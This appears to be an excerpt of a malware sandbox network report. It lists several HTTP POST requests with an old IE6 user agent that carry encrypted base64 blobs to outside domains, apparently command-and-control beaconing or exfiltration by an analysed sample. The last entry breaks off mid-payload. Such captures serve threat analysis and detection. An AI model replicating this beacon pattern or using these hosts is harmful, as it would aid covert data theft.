              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pohlfood.comCache-Control: no-cacheCookie: wp_wcpt_session_457bb797e09d980a27ee6e1f65ffe6c7=c75bca81ae9f510d60038bbd1f3b7ee4%7C%7C1694928410%7C%7C1694924810%7C%7C75ef7ca96274ff6fa7fa72b931dd5722Data Raw: 6e 5a 32 6d 72 4d 69 79 41 63 36 65 68 53 47 30 43 37 64 49 31 54 73 4e 62 2f 5a 51 76 63 31 38 66 4b 72 4b 61 68 2f 34 4c 4f 56 35 64 62 37 4a 73 61 68 37 48 39 77 4b 4e 54 66 44 72 57 76 68 35 48 58 64 75 34 38 62 4e 66 4e 31 56 42 79 6f 6f 33 70 52 4f 30 2b 59 56 48 5a 6b 76 52 30 5a 6f 41 2b 51 55 46 65 43 77 49 6d 69 55 47 44 34 45 4b 4b 44 74 41 74 44 63 6f 42 68 30 36 57 2f 6e 51 54 67 30 44 48 63 64 4c 6d 75 62 69 70 6d 5a 4e 41 51 70 6b 50 31 42 2f 46 75 6c 6e 54 78 34 46 4f 51 34 6e 45 6a 2f 71 78 56 77 66 2f 38 6d 6c 47 2f 79 4b 61 33 57 30 5a 4c 35 58 56 66 56 4f 79 48 48 72 4b 4a 73 32 4a 2f 4e 57 42 58 32 77 39 59 56 2f 73 70 5a 6e 4c 4b 45 6f 6f 64 35 56 5a 65 55 58 63 52 4e 6d 4f 66 49 32 42 30 64 63 51 67 30 41 72 53 41 79 67 48 79 46 6f 48 54 44 37 33 72 77 6e 74 76 45 30 36 33 45 6e 76 35 67 78 43 4f 34 66 79 6e 72 6e 58 6a 72 74 33 54 34 43 4d 44 54 5a 70 46 64 52 48 70 49 39 48 4b 49 77 79 58 53 78 49 49 52 65 44 6f 35 6e 72 39 37 72 76 70 67 75 57 37 72 64 54 33 4a 4f 41 2b 54 42 54 78 6f 75 57 7a 30 67 33 70 54 63 68 6b 54 6d 6e 68 41 55 30 4f 76 56 2f 6b 6e 46 76 6f 42 51 63 54 66 42 71 6c 6c 39 30 66 34 62 50 6d 7a 6a 69 47 43 54 39 79 41 59 6f 73 35 50 46 67 35 47 48 4b 61 46 2b 4b 6b 73 35 59 74 44 79 35 30 30 6b 51 50 63 59 71 62 61 31 71 67 4f 6f 49 76 58 74 63 6b 61 58 55 4f 71 58 79 46 75 72 6b 35 67 53 37 66 61 42 45 55 53 4b 5a 34 43 78 4e 33 73 70 59 67 38 61 4a 39 65 33 67 56 65 41 6d 64 50 6e 76 49 66 58 72 46 44 44 7a 41 61 36 4f 39 75 6a 52 6a 56 5a 76 70 4c 61 30 74 48 53 66 62 72 69 6e 77 4e 4d 6b 30 4a 34 5a 62 4e 36 44 62 4e 2b 42 74 44 55 4a 39 37 6e 56 38 77 6c 41 65 77 6e 34 55 6a 4e 58 70 2b 77 54 69 52 76 6e 39 33 43 64 67 3d 3d Data Ascii: nZ2mrMiyAc6ehSG0C7dI1TsNb/ZQvc18fKrKah/4LOV5db7Jsah7H9wKNTfDrWvh5HXdu48bNfN1VByoo3pRO0+YVHZkvR0ZoA+QUFeCwImiUGD4EKKDtAtDcoBh06W/nQTg0DHcdLmubipmZNAQpkP1B/FulnTx4FOQ4nEj/qxVwf/8mlG/yKa3W0ZL5XVfVOyHHrKJs2J/NWBX2w9YV/spZnLKEood5VZeUXcRNmOfI2B0dcQg0ArSAygHyFoHTD73rwntvE063Env5gxCO4fynrnXjrt3T4CMDTZpFdRHpI9HKIwyXSxIIReDo5nr97rvpguW7rdT3JOA+TBTxouWz0g3pTchkTmnhAU0OvV/knFvoBQcTfBqll90f4bPmzjiGCT9yAYos5PFg5GHKaF+Kks5YtDy500kQPcYqba1qgOoIvXtckaXUOqXyFurk5gS7faBEUSKZ4CxN3spYg8aJ9e3gVeAmdPnvIfXrFDDzAa6O9ujRjVZvpLa0tHSfbrinwNMk0J4ZbN6DbN+BtDUJ97nV8wlAewn4UjNXp+wTiRvn93Cdg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.11tochi.netCache-Control: no-cacheData Raw: 73 39 71 65 51 6e 72 53 4a 38 36 5a 63 73 52 66 48 54 38 37 49 4c 33 78 37 61 2f 71 55 2f 33 48 54 67 51 64 4a 4a 2b 68 44 4e 73 6a 6b 6c 36 4c 64 2b 30 52 4e 6d 67 4b 33 5a 4c 4e 50 6a 5a 76 4f 51 45 55 72 46 69 34 54 39 36 7a 76 4b 6f 78 57 73 6b 34 77 68 6b 77 6d 33 38 46 36 48 65 59 65 53 59 30 59 34 79 55 6a 41 59 65 31 37 47 68 6a 42 66 73 70 4f 6d 46 4a 45 79 41 4c 34 6d 4d 6d 71 54 52 79 4c 62 31 45 75 53 32 75 34 78 47 73 39 69 2b 38 61 6c 7a 32 5a 55 53 79 55 4d 4f 7a 69 64 69 4a 5a 55 6f 68 54 71 71 73 54 64 79 71 6d 4c 55 59 69 65 34 4a 64 70 6c 46 38 37 39 71 45 42 6d 49 63 33 2f 57 64 4b 38 4b 73 62 44 47 52 37 67 6b 65 55 7a 76 45 62 78 31 42 55 68 74 58 71 76 39 36 52 7a 46 66 41 51 77 39 4b 66 62 69 34 6f 66 7a 71 6c 4e 64 35 41 39 30 7a 52 46 64 6e 67 7a 58 58 71 53 4b 66 4e 69 61 4e 78 49 47 69 52 53 31 47 38 35 34 65 7a 4b 69 64 64 43 74 4a 72 63 73 46 6d 61 5a 78 65 75 33 6c 56 62 55 4c 69 49 6e 58 4c 69 52 57 2f 57 72 4a 41 65 38 33 45 69 53 52 30 7a 36 67 47 4f 2f 44 34 37 65 2b 72 67 56 6d 71 43 52 69 30 63 51 5a 4c 53 73 50 65 35 43 78 30 6f 30 73 39 76 6a 42 38 54 57 51 73 6c 61 39 77 71 49 57 4d 58 78 72 62 70 48 53 41 31 68 4f 72 6d 35 41 66 38 4d 4c 78 2f 49 56 4f 57 70 76 62 68 46 77 76 48 34 36 52 77 38 59 6f 68 63 45 75 74 59 66 32 61 50 6f 72 48 37 73 64 31 59 6f 39 51 30 4c 45 34 4a 4f 34 49 49 5a 62 58 4e 62 53 2f 32 69 76 31 37 6e 63 4b 4d 6e 45 70 58 56 39 6f 34 44 51 4d 4f 61 50 61 2f 43 62 2b 64 43 57 55 51 35 48 71 52 6a 57 61 58 4d 44 68 49 62 74 33 79 6d 78 43 51 50 37 4e 65 6f 4d 6f 2f 59 37 39 2b 79 75 79 43 45 3d Data Ascii: s9qeQnrSJ86ZcsRfHT87IL3x7a/qU/3HTgQdJJ+hDNsjkl6Ld+0RNmgK3ZLNPjZvOQEUrFi4T96zvKoxWsk4whkwm38F6HeYeSY0Y4yUjAYe17GhjBfspOmFJEyAL4mMmqTRyLb1EuS2u4xGs9i+8alz2ZUSyUMOzidiJZUohTqqsTdyqmLUYie4JdplF879qEBmIc3/WdK8KsbDGR7gkeUzvEbx1BUhtXqv96RzFfAQw9Kfbi4ofzqlNd5A90zRFdngzXXqSKfNiaNxIGiRS1G854ezKiddCtJrcsFmaZxeu3lVbULiInXLiRW/WrJAe83EiSR0z6gGO/D47e+rgVmqCRi0cQZLSsPe5Cx0o0s9vjB8TWQsla9wqIWMXxrbpHSA1hOrm5Af8MLx/IVOWpvbhFwvH46Rw8YohcEutYf2aPorH7sd1Yo9Q0LE4JO4IIZbXNbS/2iv17ncKMnEpXV9o4DQMOaPa/Cb+dCWUQ5HqRjWaXMDhIbt3ymxCQP7NeoMo/Y79+yuyCE=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 4b 4e 79 50 33 2f 44 62 52 63 36 4e 42 42 71 4c 41 37 34 4d 42 71 4f 59 2b 44 71 59 4d 58 31 69 4a 4e 4a 77 37 76 6f 56 41 57 71 55 62 46 59 4a 71 43 42 44 4c 5a 4e 5a 75 67 58 6e 4b 74 32 6c 76 50 58 52 73 2b 48 73 56 6c 79 58 53 73 30 43 39 32 48 64 35 4e 44 4a 7a 51 64 78 6d 42 4a 36 31 33 72 31 2b 6e 31 4a 51 45 39 2b 57 66 41 53 4c 63 45 30 55 51 67 6a 33 64 63 78 67 37 6d 68 6b 35 6e 39 65 47 52 72 6f 2b 46 68 52 50 64 50 6f 67 6c 77 7a 4b 52 37 72 72 36 54 37 37 4f 6f 4d 6e 38 69 4a 39 46 37 31 43 78 4d 6f 58 45 34 54 2f 74 31 44 54 64 4c 59 31 78 45 39 4b 42 46 34 46 6c 37 74 59 73 41 36 56 6f 44 5a 2f 52 67 69 6a 4d 74 31 68 50 62 49 49 67 44 6e 43 61 61 6e 71 31 69 4e 77 6e 77 2f 67 67 44 63 75 37 36 47 71 70 64 55 55 41 51 44 56 35 7a 2f 57 34 71 56 74 5a 34 58 64 71 2b 68 53 50 54 2f 58 71 48 66 55 72 41 69 33 7a 44 51 32 4f 4d 53 76 36 59 56 67 6d 4b 48 42 4a 71 7a 4f 4a 6f 47 55 69 73 62 39 33 7a 37 68 4f 77 46 68 2b 47 48 77 4c 73 61 49 44 6b 42 59 6b 7a 38 63 7a 4b 43 57 4c 64 2b 30 4a 75 74 70 2b 79 65 68 4e 78 58 54 59 41 48 65 4e 30 37 66 71 43 75 56 37 47 6a 34 46 31 6c 75 6b 68 6c 70 30 51 72 67 6d 59 32 4e 65 65 62 45 38 71 7a 32 4b 4a 6c 43 44 38 5a 62 56 36 32 44 30 46 6c 52 6b 55 64 4e 58 34 62 75 63 70 67 4c 5a 69 2b 42 33 46 65 74 67 58 61 73 73 6a 61 42 76 30 55 51 53 61 59 62 37 54 73 43 43 30 71 5a 4b 6b 47 46 51 55 39 36 54 74 79 66 58 42 70 63 43 35 67 49 45 4c 38 36 6e 79 43 76 70 58 36 4e 6a 6d 38 76 6c 38 38 51 67 55 78 70 4e 73 69 35 78 68 54 47 47 35 47 58 58 44 6f 78 46 4d 6b 71 58 39 39 4a 66 6b 78 75 4a 37 4e 44 2f 30 33 45 34 4b 2b 52 72 74 2b 37 43 38 75 42 34 43 2b 34 53 53 4e 53 39 7a 4d 6e 64 4c 32 72 66 50 6c 7a 77 6a Data Ascii: KNyP3/DbRc6NBBqLA74MBqOY+DqYMX1iJNJw7voVAWqUbFYJqCBDLZNZugXnKt2lvPXRs+HsVlyXSs0C92Hd5NDJzQdxmBJ613r1+n1JQE9+WfASLcE0UQgj3dcxg7mhk5n9eGRro+FhRPdPoglwzKR7rr6T77OoMn8iJ9F71CxMoXE4T/t1DTdLY1xE9KBF4Fl7tYsA6VoDZ/RgijMt1hPbIIgDnCaanq1iNwnw/ggDcu76GqpdUUAQDV5z/W4qVtZ4Xdq+hSPT/XqHfUrAi3zDQ2OMSv6YVgmKHBJqzOJoGUisb93z7hOwFh+GHwLsaIDkBYkz8czKCWLd+0Jutp+yehNxXTYAHeN07fqCuV7Gj4F1lukhlp0QrgmY2NeebE8qz2KJlCD8ZbV62D0FlRkUdNX4bucpgLZi+B3FetgXassjaBv0UQSaYb7TsCC0qZKkGFQU96TtyfXBpcC5gIEL86nyCvpX6Njm8vl88QgUxpNsi5xhTGG5GXXDoxFMkqX99JfkxuJ7ND/03E4K+Rrt+7C8uB4C+4SSNS9zMndL2rfPlzwj
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pb-games.comCache-Control: no-cacheData Raw: 4b 4e 79 50 33 2f 44 62 52 63 36 4e 42 42 71 4c 41 37 34 4d 42 71 4f 59 2b 44 71 59 4d 58 31 69 4a 4e 4a 77 37 76 6f 56 41 57 71 55 62 46 59 4a 71 43 42 44 4c 5a 4e 5a 75 67 58 6e 4b 74 32 6c 76 50 58 52 73 2b 48 73 56 6c 79 58 53 73 30 43 39 32 48 64 35 4e 44 4a 7a 51 64 78 6d 42 4a 36 31 33 72 31 2b 6e 31 4a 51 45 39 2b 57 66 41 53 4c 63 45 30 55 51 67 6a 33 64 63 78 67 37 6d 68 6b 35 6e 39 65 47 52 72 6f 2b 46 68 52 50 64 50 6f 67 6c 77 7a 4b 52 37 72 72 36 54 37 37 4f 6f 4d 6e 38 69 4a 39 46 37 31 43 78 4d 6f 58 45 34 54 2f 74 31 44 54 64 4c 59 31 78 45 39 4b 42 46 34 46 6c 37 74 59 73 41 36 56 6f 44 5a 2f 52 67 69 6a 4d 74 31 68 50 62 49 49 67 44 6e 43 61 61 6e 71 31 69 4e 77 6e 77 2f 67 67 44 63 75 37 36 47 71 70 64 55 55 41 51 44 56 35 7a 2f 57 34 71 56 74 5a 34 58 64 71 2b 68 53 50 54 2f 58 71 48 66 55 72 41 69 33 7a 44 51 32 4f 4d 53 76 36 59 56 67 6d 4b 48 42 4a 71 7a 4f 4a 6f 47 55 69 73 62 39 33 7a 37 68 4f 77 46 68 2b 47 48 77 4c 73 61 49 44 6b 42 59 6b 7a 38 63 7a 4b 43 57 4c 64 2b 30 4a 75 74 70 2b 79 65 68 4e 78 58 54 59 41 48 65 4e 30 37 66 71 43 75 56 37 47 6a 34 46 31 6c 75 6b 68 6c 70 30 51 72 67 6d 59 32 4e 65 65 62 45 38 71 7a 32 4b 4a 6c 43 44 38 5a 62 56 36 32 44 30 46 6c 52 6b 55 64 4e 58 34 62 75 63 70 67 4c 5a 69 2b 42 33 46 65 74 67 58 61 73 73 6a 61 42 76 30 55 51 53 61 59 62 37 54 73 43 43 30 71 5a 4b 6b 47 46 51 55 39 36 54 74 79 66 58 42 70 63 43 35 67 49 45 4c 38 36 6e 79 43 76 70 58 36 4e 6a 6d 38 76 6c 38 38 51 67 55 78 70 4e 73 69 35 78 68 54 47 47 35 47 58 58 44 6f 78 46 4d 6b 71 58 39 39 4a 66 6b 78 75 4a 37 4e 44 2f 30 33 45 34 4b 2b 52 72 74 2b 37 43 38 75 42 34 43 2b 34 53 53 4e 53 39 7a 4d 6e 64 4c 32 72 66 50 6c 7a 77 6a Data Ascii: KNyP3/DbRc6NBBqLA74MBqOY+DqYMX1iJNJw7voVAWqUbFYJqCBDLZNZugXnKt2lvPXRs+HsVlyXSs0C92Hd5NDJzQdxmBJ613r1+n1JQE9+WfASLcE0UQgj3dcxg7mhk5n9eGRro+FhRPdPoglwzKR7rr6T77OoMn8iJ9F71CxMoXE4T/t1DTdLY1xE9KBF4Fl7tYsA6VoDZ/RgijMt1hPbIIgDnCaanq1iNwnw/ggDcu76GqpdUUAQDV5z/W4qVtZ4Xdq+hSPT/XqHfUrAi3zDQ2OMSv6YVgmKHBJqzOJoGUisb93z7hOwFh+GHwLsaIDkBYkz8czKCWLd+0Jutp+yehNxXTYAHeN07fqCuV7Gj4F1lukhlp0QrgmY2NeebE8qz2KJlCD8ZbV62D0FlRkUdNX4bucpgLZi+B3FetgXassjaBv0UQSaYb7TsCC0qZKkGFQU96TtyfXBpcC5gIEL86nyCvpX6Njm8vl88QgUxpNsi5xhTGG5GXXDoxFMkqX99JfkxuJ7ND/03E4K+Rrt+7C8uB4C+4SSNS9zMndL2rfPlzwj
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sclover3.comCache-Control: no-cacheData Raw: 6c 54 6f 53 49 70 44 31 59 4d 35 41 54 32 2b 38 49 38 74 43 56 45 4d 48 45 67 57 34 36 2b 4d 76 78 50 32 4a 4c 6f 77 55 46 36 33 35 77 41 64 6a 69 54 6b 71 4f 57 69 6e 76 39 42 49 33 46 47 68 2b 53 37 45 67 4d 65 6f 78 51 6e 4f 4f 42 68 74 41 49 53 2b 4c 34 65 6c 66 73 2f 35 4d 57 50 41 63 77 64 46 37 63 74 52 48 4e 71 42 56 35 6f 65 52 5a 35 71 59 34 47 57 44 51 32 4e 71 69 79 69 58 59 73 72 65 71 47 71 79 71 61 52 6d 77 69 31 4c 47 59 4f 2f 66 56 31 70 6c 44 70 49 48 45 62 6b 6e 2f 61 46 4b 76 59 76 65 36 37 39 4f 4c 6d 4d 34 51 73 70 32 76 68 36 31 65 41 77 6b 78 62 52 38 34 36 7a 6f 66 4c 6a 34 76 5a 63 78 4f 51 36 34 6b 72 32 77 6b 65 77 51 34 44 57 54 43 2b 6e 50 63 52 61 55 6f 36 2f 79 6b 47 46 6b 4f 41 77 64 48 48 50 58 71 76 56 66 6f 51 38 55 4b 45 5a 59 77 37 75 6c 78 4a 52 52 4d 6f 4b 42 30 51 77 4e 79 47 70 48 78 73 4c 37 51 73 59 74 50 57 74 50 39 57 74 34 4f 65 58 6f 66 4a 4f 50 37 56 65 34 68 79 74 5a 6e 77 47 76 38 74 76 2f 67 66 48 69 54 63 37 2f 4a 2f 54 41 75 75 67 54 6d 52 4e 59 77 6e 30 65 6e 4d 44 68 50 33 64 6b 52 2f 78 79 41 43 65 4e 34 49 34 2f 4f 6b 42 2b 73 38 77 49 67 5a 62 5a 47 6d 49 58 59 2f 6a 53 78 7a 6b 6b 53 66 71 4e 53 48 57 54 68 6f 72 71 6c 34 55 43 6f 70 64 46 54 55 31 75 6e 68 34 49 48 69 30 6e 43 61 6c 4d 59 68 6c 78 64 42 4e 54 42 61 45 50 2f 39 34 68 41 67 54 4f 6c 44 6e 4c 5a 79 53 4d 47 53 4a 32 41 56 46 74 6b 56 68 35 63 51 39 56 72 69 36 31 77 72 6e 4c 49 52 65 4d 49 69 47 4c 55 37 6a 46 55 65 4e 50 79 33 66 48 65 70 57 50 41 57 4d 61 6d 35 70 4c 46 2f 73 2b 2f 53 6f 48 41 76 70 75 73 61 47 37 34 37 67 4b 49 32 61 31 31 6b 76 51 2b 78 59 2f 46 30 33 41 61 64 58 68 30 4e 6e 6f 67 72 71 74 61 66 43 64 41 71 70 50 36 78 6e 56 64 47 65 52 41 3d Data Ascii: lToSIpD1YM5AT2+8I8tCVEMHEgW46+MvxP2JLowUF635wAdjiTkqOWinv9BI3FGh+S7EgMeoxQnOOBhtAIS+L4elfs/5MWPAcwdF7ctRHNqBV5oeRZ5qY4GWDQ2NqiyiXYsreqGqyqaRmwi1LGYO/fV1plDpIHEbkn/aFKvYve679OLmM4Qsp2vh61eAwkxbR846zofLj4vZcxOQ64kr2wkewQ4DWTC+nPcRaUo6/ykGFkOAwdHHPXqvVfoQ8UKEZYw7ulxJRRMoKB0QwNyGpHxsL7QsYtPWtP9Wt4OeXofJOP7Ve4hytZnwGv8tv/gfHiTc7/J/TAuugTmRNYwn0enMDhP3dkR/xyACeN4I4/OkB+s8wIgZbZGmIXY/jSxzkkSfqNSHWThorql4UCopdFTU1unh4IHi0nCalMYhlxdBNTBaEP/94hAgTOlDnLZySMGSJ2AVFtkVh5cQ9Vri61wrnLIReMIiGLU7jFUeNPy3fHepWPAWMam5pLF/s+/SoHAvpusaG747gKI2a11kvQ+xY/F03AadXh0NnogrqtafCdAqpP6xnVdGeRA=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 4c 62 50 73 49 65 67 6d 43 5a 62 55 32 52 37 59 71 31 30 4f 54 56 73 36 46 76 6a 77 77 38 30 77 6e 42 44 72 63 79 33 6f 34 4f 54 53 51 2f 33 32 58 7a 78 6a 57 59 30 2b 56 62 6d 4c 31 4d 62 62 4f 46 6e 32 67 4b 6d 59 4d 5a 6a 64 77 58 44 6e 68 78 4d 4b 32 6a 4f 6b 51 42 76 67 77 42 6e 69 58 54 6a 36 6f 48 67 78 57 2b 48 79 49 51 32 71 7a 63 56 78 73 51 48 54 54 73 4b 58 6a 45 41 6c 74 5a 53 36 31 55 74 68 31 6d 71 45 4a 6c 4a 4d 33 64 4c 78 51 72 4f 6e 36 75 2f 37 4e 56 38 34 39 4f 56 67 73 57 31 69 48 47 30 38 79 44 76 55 6b 69 47 50 2b 67 6a 78 30 47 31 46 30 4a 48 71 45 47 58 42 42 75 35 68 51 77 4b 4d 6c 32 7a 6f 38 38 68 70 47 75 5a 53 79 4e 64 70 6b 51 4e 50 55 41 46 51 61 76 2b 65 4d 50 66 6d 37 4a 48 6e 48 72 74 4d 56 4f 36 55 76 43 44 76 6a 6c 71 51 2f 44 52 4c 56 75 4b 6b 44 4f 30 31 30 48 78 4d 4a 4f 67 4f 6e 31 36 56 5a 6c 67 4c 4a 71 58 43 30 77 47 36 58 43 6f 76 43 61 65 33 72 70 6b 4b 50 64 55 73 7a 62 79 76 6d 39 70 64 6a 44 59 79 6b 70 73 76 6f 68 6a 57 77 49 65 75 4c 56 64 31 57 35 5a 4c 58 78 42 73 66 61 6b 33 79 2f 42 67 39 4c 69 51 4b 77 4c 4f 49 2f 7a 6a 6a 61 53 37 6e 76 2b 64 73 61 37 5a 55 6c 61 33 49 4d 76 71 6f 70 73 53 7a 30 6d 6f 64 56 75 6d 32 55 6c 47 58 6b 32 62 33 62 71 36 79 52 77 57 2f 56 48 44 4a 6c 71 5a 46 68 33 38 38 64 37 6c 51 2f 62 6c 4d 76 6b 36 7a 4b 32 50 72 74 73 37 4f 7a 38 35 37 70 64 71 70 38 52 49 39 61 58 73 63 71 6a 6e 35 34 78 55 59 55 35 78 6e 78 56 36 6c 56 79 57 44 50 44 48 4e 4f 79 4e 69 39 31 74 59 34 56 52 71 31 6b 78 32 65 53 6a 39 67 76 4f 58 66 4d 41 71 75 75 63 32 65 50 59 42 43 4b 31 42 69 68 2f 30 41 3d 3d Data Ascii: LbPsIegmCZbU2R7Yq10OTVs6Fvjww80wnBDrcy3o4OTSQ/32XzxjWY0+VbmL1MbbOFn2gKmYMZjdwXDnhxMK2jOkQBvgwBniXTj6oHgxW+HyIQ2qzcVxsQHTTsKXjEAltZS61Uth1mqEJlJM3dLxQrOn6u/7NV849OVgsW1iHG08yDvUkiGP+gjx0G1F0JHqEGXBBu5hQwKMl2zo88hpGuZSyNdpkQNPUAFQav+eMPfm7JHnHrtMVO6UvCDvjlqQ/DRLVuKkDO010HxMJOgOn16VZlgLJqXC0wG6XCovCae3rpkKPdUszbyvm9pdjDYykpsvohjWwIeuLVd1W5ZLXxBsfak3y/Bg9LiQKwLOI/zjjaS7nv+dsa7ZUla3IMvqopsSz0modVum2UlGXk2b3bq6yRwW/VHDJlqZFh388d7lQ/blMvk6zK2Prts7Oz857pdqp8RI9aXscqjn54xUYU5xnxV6lVyWDPDHNOyNi91tY4VRq1kx2eSj9gvOXfMAquuc2ePYBCK1Bih/0A==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 56 68 2b 41 4a 30 4e 56 43 5a 59 63 6a 72 61 41 53 76 6c 72 35 6d 79 45 78 56 6e 70 58 4b 75 66 4a 37 66 64 75 65 45 69 59 36 33 74 4b 62 37 53 67 78 41 4b 42 6c 32 49 30 55 55 4c 73 38 71 43 39 56 69 6a 4d 36 56 7a 32 57 6f 30 56 77 70 79 76 74 48 78 74 31 33 79 79 69 73 50 52 70 73 59 53 6f 6b 57 4f 2b 42 52 31 2b 43 66 58 6a 45 45 39 74 34 32 4e 73 6a 67 30 4a 44 74 56 71 47 38 59 48 68 52 62 6a 45 2b 55 2f 61 68 48 42 45 4c 45 68 4a 41 63 51 49 51 65 56 38 43 68 6d 71 6e 4e 41 43 46 2f 77 68 73 49 4c 56 4c 4a 34 4f 6e 42 37 72 33 48 69 4a 36 78 6e 34 39 33 52 2b 35 6a 4a 71 77 6a 6f 73 33 6a 39 43 79 35 6f 78 2b 6c 6f 2b 62 55 2b 70 46 48 31 46 79 62 78 66 43 47 52 67 61 4c 61 35 6f 77 54 31 70 69 55 50 62 51 63 38 6b 6c 41 6c 2b 56 58 78 75 75 7a 74 65 2b 7a 55 51 6c 31 6f 37 4a 33 63 6a 6c 50 49 4c 4b 70 47 44 2f 4d 4c 5a 4b 78 75 50 68 39 75 48 5a 69 2b 78 73 64 41 2f 72 31 4f 31 62 6b 59 66 35 45 77 35 6e 74 48 64 62 66 32 38 4c 48 46 51 30 6d 37 55 38 56 63 4c 66 38 77 5a 59 65 48 6a 72 66 6c 30 77 33 43 4a 53 6b 4c 43 74 4a 76 70 6a 64 52 6c 34 53 7a 58 4f 56 71 47 34 49 61 55 5a 4a 64 54 4f 78 50 41 6d 58 2f 6f 51 4f 46 37 49 76 72 78 4c 42 65 36 70 2b 63 54 39 35 33 30 72 4b 50 2f 77 34 68 48 30 39 41 67 31 79 30 43 42 46 35 2b 39 4a 54 6e 51 6c 5a 67 6e 47 48 71 59 35 48 4c 36 36 36 66 47 7a 6a 51 4c 62 4c 4e 79 53 36 2f 50 76 63 42 4c 32 66 33 73 52 6d 59 56 56 42 33 68 4a 32 75 57 75 66 63 4f 5a 55 6a 64 4b 4f 48 77 79 57 7a 32 70 5a 41 52 75 32 52 62 51 51 51 75 6a 4d 69 74 32 6b 33 74 4d 2b 2f 6e 36 56 64 6e 2b 64 70 38 47 44 57 2f 70 63 30 55 4f 59 3d Data Ascii: Vh+AJ0NVCZYcjraASvlr5myExVnpXKufJ7fdueEiY63tKb7SgxAKBl2I0UULs8qC9VijM6Vz2Wo0VwpyvtHxt13yyisPRpsYSokWO+BR1+CfXjEE9t42Nsjg0JDtVqG8YHhRbjE+U/ahHBELEhJAcQIQeV8ChmqnNACF/whsILVLJ4OnB7r3HiJ6xn493R+5jJqwjos3j9Cy5ox+lo+bU+pFH1FybxfCGRgaLa5owT1piUPbQc8klAl+VXxuuzte+zUQl1o7J3cjlPILKpGD/MLZKxuPh9uHZi+xsdA/r1O1bkYf5Ew5ntHdbf28LHFQ0m7U8VcLf8wZYeHjrfl0w3CJSkLCtJvpjdRl4SzXOVqG4IaUZJdTOxPAmX/oQOF7IvrxLBe6p+cT9530rKP/w4hH09Ag1y0CBF5+9JTnQlZgnGHqY5HL666fGzjQLbLNyS6/PvcBL2f3sRmYVVB3hJ2uWufcOZUjdKOHwyWz2pZARu2RbQQQujMit2k3tM+/n6Vdn+dp8GDW/pc0UOY=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 42 7a 6a 57 51 54 67 77 43 70 62 55 68 6c 66 53 75 37 61 68 6e 79 73 63 6e 70 47 41 58 35 57 54 37 49 36 35 6d 74 4d 56 6d 71 51 65 51 43 52 6c 31 4e 5a 6d 47 6f 79 4f 74 41 55 73 39 6f 61 39 42 45 6a 4d 33 65 51 68 6b 61 65 59 4f 58 76 37 47 5a 38 39 47 5a 47 37 50 73 72 30 35 50 2f 2f 67 58 48 47 6f 61 75 66 33 4e 74 4d 64 37 35 61 73 34 4b 68 2f 50 51 30 5a 47 75 41 55 44 33 6a 69 4c 53 30 70 6e 57 71 79 75 77 68 52 4e 58 76 71 73 43 6c 54 51 31 50 4a 79 59 4a 61 61 4f 6c 58 4a 47 51 35 42 61 6c 74 64 46 32 76 65 64 35 67 71 6a 75 74 48 31 4a 4f 32 78 74 76 5a 51 44 71 74 71 62 72 42 54 61 6f 36 63 6c 54 78 39 63 31 4e 58 45 62 4b 48 6e 66 55 62 79 71 42 76 53 71 62 48 4b 50 2b 33 56 76 6c 33 47 41 66 48 33 57 4d 41 2b 57 54 6a 6e 31 76 47 49 78 42 4b 52 46 31 65 30 33 34 6f 56 53 75 46 54 44 72 72 6a 2b 64 67 6b 72 68 2f 5a 32 74 75 57 62 4d 6b 53 61 6f 31 44 31 6d 75 67 6a 73 43 53 62 5a 59 63 61 71 56 4f 38 4c 66 31 44 7a 43 47 41 31 71 33 42 43 47 37 69 6a 56 62 2b 6d 44 78 77 39 4b 4b 33 79 37 2f 36 55 41 7a 35 7a 6b 42 62 4b 68 67 63 55 73 73 54 32 68 51 75 54 41 33 51 47 6d 6c 5a 75 41 61 59 5a 41 71 69 64 6c 68 76 56 66 6e 75 66 69 71 57 73 65 4e 67 5a 6f 6f 75 62 51 44 55 4b 66 68 66 68 53 72 50 7a 54 35 39 57 54 39 6d 64 76 77 6e 62 6f 4d 54 34 2b 67 68 69 6b 5a 34 72 4e 30 41 64 65 74 47 77 6b 49 72 4a 76 71 4e 78 4c 46 74 63 57 45 61 63 68 57 78 42 62 6d 4e 49 6f 58 39 46 37 64 53 59 54 38 4e 54 7a 6c 33 79 53 35 32 47 78 51 58 55 2f 4d 77 38 41 5a 44 4a 32 65 38 74 35 69 6f 62 39 72 38 61 36 50 54 74 6c 41 74 35 79 2b 6e 4a 44 33 78 6a 69 51 58 63 55 78 45 45 73 5a 33 41 6d 78 7a 76 4e 52 63 56 56 54 76 47 30 50 71 4c 65 52 61 77 32 51 56 5a 6f 53 54 69 55 66 4a 39 56 4c 75 49 52 68 74 43 59 38 2f 39 7a 7a 70 75 53 35 30 55 65 4c Data Ascii: 